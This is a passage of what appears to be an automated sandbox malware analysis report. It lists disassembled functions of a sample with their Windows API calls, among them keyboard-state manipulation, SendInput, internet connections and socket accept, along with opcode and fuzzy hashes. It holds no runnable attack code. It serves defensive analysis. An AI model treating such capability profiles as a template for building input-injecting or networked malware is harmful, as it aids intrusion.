                                                                                                                      • Opcode Fuzzy Hash: 038d6d38312205b80d18cc1878c1924837b9100e0aa14dc073edbb83e7c634f2
                                                                                                                      • Instruction Fuzzy Hash: 2AA145756047059FDB12DF15C891A6AF7E4FF89324F048459FA99AB3A1CB30ED40CB82
                                                                                                                      Function 003C42EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3877424927-0
                                                                                                                      • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                      • Instruction ID: 8350499645aa6c81635f27dd357af92c6ba6efd71b4519c88a3f153b944b2cf9
                                                                                                                      • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                      • Instruction Fuzzy Hash: 7751EA34A00345DBDB2A9F6A8860F6E77B5AF80320F25872DF835D66D1D770DD619B40
                                                                                                                      Function 003EEE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003EEF32
                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 003EEF58
                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003EEF7D
                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003EEFA9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3321077145-0
                                                                                                                      • Opcode ID: f133640c4601edf4b7c0217868bbf1aa06d45163ede3355f47b6befd6c8c0040
                                                                                                                      • Instruction ID: 41b05dbef64971aa0538d51820b03583f66edff989fc7f3b2fc538d87547543e
                                                                                                                      • Opcode Fuzzy Hash: f133640c4601edf4b7c0217868bbf1aa06d45163ede3355f47b6befd6c8c0040
                                                                                                                      • Instruction Fuzzy Hash: 27413D35600621DFCB12EF16C545A59FBE5EF89320B198099EC45AF3A2CB34FD41CB91
                                                                                                                      Function 0040D5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0040D617
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D68D
                                                                                                                      • PtInRect.USER32(?,?,0040EB2C), ref: 0040D69D
                                                                                                                      • MessageBeep.USER32(00000000), ref: 0040D70E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1352109105-0
                                                                                                                      • Opcode ID: 9bca5afa8235ea4f5a3b9cf008d325a081fc69143dc367774508b1169259e936
                                                                                                                      • Instruction ID: 175f30b1dc43042f1d2b8f81db90bd0a794abdf36aa4ba2ef73bda15036d111a
                                                                                                                      • Opcode Fuzzy Hash: 9bca5afa8235ea4f5a3b9cf008d325a081fc69143dc367774508b1169259e936
                                                                                                                      • Instruction Fuzzy Hash: 5F418B34E00108DFCB11DF99D884AA97BF5BF89300F1845BAE409AB2A1D735E84ACF49
                                                                                                                      Function 003E4497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 003E44EE
                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 003E450A
                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 003E456A
                                                                                                                      • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 003E45C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      • Opcode ID: f2d58669f252829fee4fea38c2b08a75c5f34fcf0ec0e00dd6c4fab3a5e79936
                                                                                                                      • Instruction ID: 7888d196616982490f4c703e8ad2ee51ced9634cdc85b9fe0d1f104aa56b1cfc
                                                                                                                      • Opcode Fuzzy Hash: f2d58669f252829fee4fea38c2b08a75c5f34fcf0ec0e00dd6c4fab3a5e79936
                                                                                                                      • Instruction Fuzzy Hash: 3931F671A002F86BEF329B6688087BE7BA59B4F310F05036AF082972C1C7749A499761
                                                                                                                      Function 003D4DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003D4DE8
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 003D4E16
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003D4E44
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003D4E7A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      • Opcode ID: a8ef8fbd4b9c9a84c9412991fdb3293f29115b82fc591c76432cc6f49300737b
                                                                                                                      • Instruction ID: 0ed3225466f1031225750111e849eeb7b2bdc24405f7587c141b1ad9534b3554
                                                                                                                      • Opcode Fuzzy Hash: a8ef8fbd4b9c9a84c9412991fdb3293f29115b82fc591c76432cc6f49300737b
                                                                                                                      • Instruction Fuzzy Hash: 9E31A132600256FFDF229F74D845BBA7BAAFF41310F16452AE8619B2A1E730DC51DB90
                                                                                                                      Function 00407AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 00407AB6
                                                                                                                        • Part of subcall function 003E69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 003E69E3
                                                                                                                        • Part of subcall function 003E69C9: GetCurrentThreadId.KERNEL32 ref: 003E69EA
                                                                                                                        • Part of subcall function 003E69C9: AttachThreadInput.USER32(00000000,?,003E8127), ref: 003E69F1
                                                                                                                      • GetCaretPos.USER32(?), ref: 00407AC7
                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00407B00
                                                                                                                      • GetForegroundWindow.USER32 ref: 00407B06
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2759813231-0
                                                                                                                      • Opcode ID: 7b905a0b54eb391a87cba8d79d27ae6bd69640105fc4c7c74d4bb16f92581af0
                                                                                                                      • Instruction ID: c9721dcaec4a6565ec68b15e64bbd901c27a1cb62caf3aafa28bc957cce96a4d
                                                                                                                      • Opcode Fuzzy Hash: 7b905a0b54eb391a87cba8d79d27ae6bd69640105fc4c7c74d4bb16f92581af0
                                                                                                                      • Instruction Fuzzy Hash: 6A314F71D00108AFCB11EFB5DC819EFBBF9EF59314B10816AF915E7211D634AE058BA0
                                                                                                                      Function 003F497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003F49B7
                                                                                                                        • Part of subcall function 003F4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003F4A60
                                                                                                                        • Part of subcall function 003F4A41: InternetCloseHandle.WININET(00000000), ref: 003F4AFD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1463438336-0
                                                                                                                      • Opcode ID: 97f6466ec5882422cd2cdac395b2d3ed9d15bbfc3ee752b09b03747a11a2478b
                                                                                                                      • Instruction ID: d9e3aacde537bb89de82002baac5648fb3b5288d5f4c08f4a74514ac6831f245
                                                                                                                      • Opcode Fuzzy Hash: 97f6466ec5882422cd2cdac395b2d3ed9d15bbfc3ee752b09b03747a11a2478b
                                                                                                                      • Instruction Fuzzy Hash: 3F219231740609BBEB139F608C00FBBB7A9FB89711F14402AFB15D6550EB719921A794
                                                                                                                      Function 00408834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 004088A3
                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004088BD
                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004088CB
                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004088D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2169480361-0
                                                                                                                      • Opcode ID: 6ccd306516280682cf0786600c00503be1846e063ec5ef860611830f6d305c7b
                                                                                                                      • Instruction ID: 0930bfc3c2ca5fd018611eb99a3ac170918f1fa8a605fd248b12ec133ab25783
                                                                                                                      • Opcode Fuzzy Hash: 6ccd306516280682cf0786600c00503be1846e063ec5ef860611830f6d305c7b
                                                                                                                      • Instruction Fuzzy Hash: A411B132704114AFDB15AB24CD05FAA7BA9EF86320F14812AF956DB2E1CB74AC01C798
                                                                                                                      Function 003F900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 003F906D
                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 003F907F
                                                                                                                      • accept.WS2_32(00000000,00000000,00000000), ref: 003F908C
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F90A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastacceptselect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 385091864-0
                                                                                                                      • Opcode ID: 011b0f9687c4931abd1070403b192eb910e42c358c57b779b30545c872d30175
                                                                                                                      • Instruction ID: ab8f5d12ad878b7a5571e490fc2874b2397fd523413470e5f6fe5147dc652681
                                                                                                                      • Opcode Fuzzy Hash: 011b0f9687c4931abd1070403b192eb910e42c358c57b779b30545c872d30175
                                                                                                                      • Instruction Fuzzy Hash: 41215475A001249FC721DF69C885A9ABBFCEF49710F00816AF949D7290DA749A45CBA0
                                                                                                                      Function 003E18E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003E2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,003E18FD,?,?,?,003E26BC,00000000,000000EF,00000119,?,?), ref: 003E2CB9
                                                                                                                        • Part of subcall function 003E2CAA: lstrcpyW.KERNEL32(00000000,?,?,003E18FD,?,?,?,003E26BC,00000000,000000EF,00000119,?,?,00000000), ref: 003E2CDF
                                                                                                                        • Part of subcall function 003E2CAA: lstrcmpiW.KERNEL32(00000000,?,003E18FD,?,?,?,003E26BC,00000000,000000EF,00000119,?,?), ref: 003E2D10
                                                                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,003E26BC,00000000,000000EF,00000119,?,?,00000000), ref: 003E1916
                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,003E26BC,00000000,000000EF,00000119,?,?,00000000), ref: 003E193C
                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,003E26BC,00000000,000000EF,00000119,?,?,00000000), ref: 003E1970
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                      • String ID: cdecl
                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                      • Opcode ID: 53aaa2c41384355066a5babc4198e7cf709b21cb4320a54c3ad0ae4f74dc8906
                                                                                                                      • Instruction ID: 4844830dc6ae60e8cd2b1e2eead4c9220930abfb72351598bfc5fc1b000597d8
                                                                                                                      • Opcode Fuzzy Hash: 53aaa2c41384355066a5babc4198e7cf709b21cb4320a54c3ad0ae4f74dc8906
                                                                                                                      • Instruction Fuzzy Hash: 3411033A200351AFCB26AF35C845E7A77B8FF44350B51812AF806CB291EB319811C7E0
                                                                                                                      Function 003E713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003E715C
                                                                                                                      • _memset.LIBCMT ref: 003E717D
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003E71CF
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 003E71D8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1157408455-0
                                                                                                                      • Opcode ID: 1a930a01e6545914befdb9e85b4d85bb307f545d92c272fdd2d94e6cf660b8ac
                                                                                                                      • Instruction ID: 9dbb18540a85e0b54c77cf97cce9ef4b4365cb4835ea3f67ef43b5b20e14310e
                                                                                                                      • Opcode Fuzzy Hash: 1a930a01e6545914befdb9e85b4d85bb307f545d92c272fdd2d94e6cf660b8ac
                                                                                                                      • Instruction Fuzzy Hash: 9611CA72E013287AD7305BA5AC4DFEBBA7CEF45760F1042AAF504E71D0D2744E808BA9
                                                                                                                      Function 003E13D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003E13EE
                                                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003E1409
                                                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003E141F
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 003E1474
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3137044355-0
                                                                                                                      • Opcode ID: 4d2d23bed38e519782478f0888b0b528d3187ed714ad6933f1deca24a8c0b1f0
                                                                                                                      • Instruction ID: 66700528198922558b52eeb7f0f827dd145416de03f820b49184952d471f3f6a
                                                                                                                      • Opcode Fuzzy Hash: 4d2d23bed38e519782478f0888b0b528d3187ed714ad6933f1deca24a8c0b1f0
                                                                                                                      • Instruction Fuzzy Hash: 9421A271A00259AFDB22DF93DC88EDABBBCEF00700F408669A512976D0D7B0E905CF50
                                                                                                                      Function 003DC265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003DC285
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003DC297
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003DC2AD
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003DC2C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
